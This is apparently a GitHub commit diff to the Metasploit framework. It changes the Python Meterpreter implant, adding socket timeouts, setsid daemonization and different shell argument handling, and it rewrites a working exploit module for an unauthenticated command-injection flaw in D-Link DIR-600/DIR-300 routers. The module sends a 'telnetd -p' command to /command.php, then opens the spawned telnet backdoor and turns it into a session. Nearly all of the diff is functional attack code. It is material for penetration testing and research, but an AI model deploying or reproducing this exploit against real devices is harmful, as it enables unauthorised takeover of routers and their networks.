sempervictus
diff --git a/‎data/meterpreter/ext_server_stdapi.py
Lines changed: 3 additions & 1 deletion b/‎data/meterpreter/ext_server_stdapi.py
Lines changed: 3 additions & 1 deletion
diff --git a/‎data/meterpreter/meterpreter.py
Lines changed: 2 additions & 0 deletions b/‎data/meterpreter/meterpreter.py
Lines changed: 2 additions & 0 deletions
diff --git a/‎modules/exploits/linux/http/dlink_command_php_exec_noauth.rb
Lines changed: 142 additions & 151 deletions b/‎modules/exploits/linux/http/dlink_command_php_exec_noauth.rb
Lines changed: 142 additions & 151 deletions
@@ -303,6 +303,7 @@ def channel_create_stdapi_fs_file(request, response):
 	fmode = packet_get_tlv(request, TLV_TYPE_FILE_MODE)
 	if fmode:
 		fmode = fmode['value']
+		fmode = fmode.replace('bb', 'b')
 	else:
 		fmode = 'rb'
 	file_h = open(fpath, fmode)
@@ -320,6 +321,7 @@ def channel_create_stdapi_net_tcp_client(request, response):
 	connected = False
 	for i in range(retries + 1):
 		sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+		sock.settimeout(3.0)
 		if local_host.get('value') and local_port.get('value'):
 			sock.bind((local_host['value'], local_port['value']))
 		try:
@@ -380,7 +382,7 @@ def stdapi_sys_process_execute(request, response):
 	if len(cmd) == 0:
 		return ERROR_FAILURE, response
 	if os.path.isfile('/bin/sh'):
-		args = ['/bin/sh', '-c', cmd, raw_args]
+		args = ['/bin/sh', '-c', cmd + ' ' + raw_args]
 	else:
 		args = [cmd]
 		args.extend(shlex.split(raw_args))
 
@@ -404,5 +404,7 @@ def create_response(self, request):
 		return resp
 
 if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
+	if hasattr(os, 'setsid'):
+		os.setsid()
 	met = PythonMeterpreter(s)
 	met.run()
@@ -8,155 +8,146 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-  Rank = ExcellentRanking
-
-  include Msf::Exploit::Remote::HttpClient
-  include Msf::Auxiliary::CommandShell
-
-  def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'D-Link Devices Unauthenticated Remote Command Execution',
-      'Description' => %q{
-        Different D-Link Routers are vulnerable to OS command injection via the web
-        interface. The vulnerability exists in command.php, which is accessible without
-        authentication. This module has been tested with the versions DIR-600 2.14b01,
-        DIR-300 rev B 2.13. Two target are included, the first one starts a telnetd service
-        and establish a session over it, the second one runs commands via the CMD target.
-        There is no wget or tftp client to upload an elf backdoor easily. According to the
-        vulnerability discoverer, more D-Link devices may affected.
-      },
-      'Author'      =>
-        [
-          'Michael Messner <[email protected]>', # Vulnerability discovery and Metasploit module
-          'juan vazquez' # minor help with msf module
-        ],
-      'License'     => MSF_LICENSE,
-      'References'  =>
-        [
-          [ 'OSVDB', '89861' ],
-          [ 'EDB', '24453' ],
-          [ 'BID', '57734' ],
-          [ 'URL', 'http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router' ],
-          [ 'URL', 'http://www.s3cur1ty.de/home-network-horror-days' ],
-          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ]
-        ],
-      'DisclosureDate' => 'Feb 04 2013',
-      'Privileged'     => true,
-      'Platform'       => ['linux','unix'],
-      'Payload'        =>
-        {
-          'DisableNops' => true,
-        },
-      'Targets'        =>
-        [
-          [ 'CMD',	#all devices
-            {
-            'Arch' => ARCH_CMD,
-            'Platform' => 'unix'
-            }
-          ],
-          [ 'Telnet',	#all devices - default target
-            {
-            'Arch' => ARCH_CMD,
-            'Platform' => 'unix'
-            }
-          ],
-        ],
-      'DefaultTarget'  => 1
-      ))
-  end
-
-  def exploit
-    if target.name =~ /CMD/
-      exploit_cmd
-    else
-      exploit_telnet
-    end
-  end
-
-  def exploit_cmd
-    if not (datastore['CMD'])
-      fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
-    end
-    cmd = "#{payload.encoded}; echo end"
-    print_status("#{rhost}:#{rport} - Sending exploit request...")
-    res = request(cmd)
-    if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux, HTTP\/1.1, DIR/)
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
-    end
-
-    if res.body.include?("end")
-      print_good("#{rhost}:#{rport} - Exploited successfully\n")
-      vprint_line("#{rhost}:#{rport} - Command: #{datastore['CMD']}\n")
-      vprint_line("#{rhost}:#{rport} - Output: #{res.body}")
-    else
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
-    end
-
-    return
-  end
-
-  def exploit_telnet
-    telnetport = rand(65535)
-
-    print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")
-
-    cmd = "telnetd -p #{telnetport}"
-
-    #starting the telnetd gives no response
-    print_status("#{rhost}:#{rport} - Sending exploit request...")
-    request(cmd)
-
-    begin
-      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
-
-      if sock
-        print_good("#{rhost}:#{rport} - Backdoor service has been spawned, handling...")
-        add_socket(sock)
-      else
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
-      end
-
-      print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}"
-      auth_info = {
-        :host   => rhost,
-        :port   => telnetport,
-        :sname => 'telnet',
-        :user   => "",
-        :pass	=> "",
-        :source_type => "exploit",
-        :active => true
-      }
-      report_auth_info(auth_info)
-      merge_me = {
-        'USERPASS_FILE' => nil,
-        'USER_FILE'     => nil,
-        'PASS_FILE'     => nil,
-        'USERNAME'      => nil,
-        'PASSWORD'      => nil
-      }
-      start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
-    rescue
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not handle the backdoor service")
-    end
-    return
-  end
-
-  def request(cmd)
-
-    uri = '/command.php'
-
-    begin
-      res = send_request_cgi({
-        'uri'    => uri,
-        'method' => 'POST',
-        'vars_post' => {
-          "cmd" => cmd
-          }
-      })
-    return res
-    rescue ::Rex::ConnectionError
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
-    end
-  end
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'        => 'D-Link Devices Unauthenticated Remote Command Execution',
+			'Description' => %q{
+				Different D-Link Routers are vulnerable to OS command injection via the web
+				interface. The vulnerability exists in command.php, which is accessible without
+				authentication. This module has been tested with the versions DIR-600 2.14b01,
+				DIR-300 rev B 2.13.
+			},
+			'Author'      =>
+				[
+					'Michael Messner <[email protected]>', # Vulnerability discovery and Metasploit module
+					'juan vazquez' # minor help with msf module
+				],
+			'License'     => MSF_LICENSE,
+			'References'  =>
+				[
+					[ 'OSVDB', '89861' ],
+					[ 'EDB', '24453' ],
+					[ 'BID', '57734' ],
+					[ 'URL', 'http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router' ],
+					[ 'URL', 'http://www.s3cur1ty.de/home-network-horror-days' ],
+					[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ]
+				],
+			'DisclosureDate' => 'Feb 04 2013',
+			'Privileged'     => true,
+			'Platform'       => 'unix',
+			'Arch'        => ARCH_CMD,
+			'Payload'     =>
+				{
+					'Compat'  => {
+						'PayloadType'    => 'cmd_interact',
+						'ConnectionType' => 'find',
+					},
+				},
+			'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
+			'Targets'        =>
+				[
+					[ 'Automatic',	{ } ]
+				],
+			'DefaultTarget'  => 0
+			))
+
+		register_advanced_options(
+			[
+				OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
+				OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]),
+				OptInt.new('SessionTimeout', [ true, 'The number of seconds to wait before building the session on the telnet connection', 10])
+			], self.class)
+
+	end
+
+	def tel_timeout
+		(datastore['TelnetTimeout'] || 10).to_i
+	end
+
+	def banner_timeout
+		(datastore['TelnetBannerTimeout'] || 25).to_i
+	end
+
+	def session_timeout
+		(datastore['SessionTimeout'] || 10).to_i
+	end
+
+	def exploit
+		telnetport = rand(65535)
+
+		print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")
+
+		cmd = "telnetd -p #{telnetport}"
+
+		#starting the telnetd gives no response
+		print_status("#{rhost}:#{rport} - Sending exploit request...")
+		request(cmd)
+
+		print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
+		sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+
+		if sock.nil?
+			fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
+		end
+
+		print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
+		prompt = negotiate_telnet(sock)
+		if prompt.nil?
+			sock.close
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
+		else
+			print_good("#{rhost}:#{rport} - Telnet session successfully established... trying to connect")
+		end
+
+		print_status("#{rhost}:#{rport} - Trying to create the Msf session...")
+		begin
+			Timeout.timeout(session_timeout) do
+				activated = handler(sock)
+				while(activated !~ /claimed/)
+					activated = handler(sock)
+				end
+			end
+		rescue ::Timeout::Error
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a Msf session")
+		end
+	end
+
+	def request(cmd)
+
+		uri = '/command.php'
+
+		begin
+			res = send_request_cgi({
+				'uri'    => uri,
+				'method' => 'POST',
+				'vars_post' => {
+					"cmd" => cmd
+					}
+			})
+		return res
+		rescue ::Rex::ConnectionError
+			fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")
+		end
+	end
+
+	def negotiate_telnet(sock)
+		begin
+			Timeout.timeout(banner_timeout) do
+				while(true)
+					data = sock.get_once(-1, tel_timeout)
+					return nil if not data or data.length == 0
+					if data =~ /\x23\x20$/
+						return true
+					end
+				end
+			end
+		rescue ::Timeout::Error
+			return nil
+		end
+	end
+
 end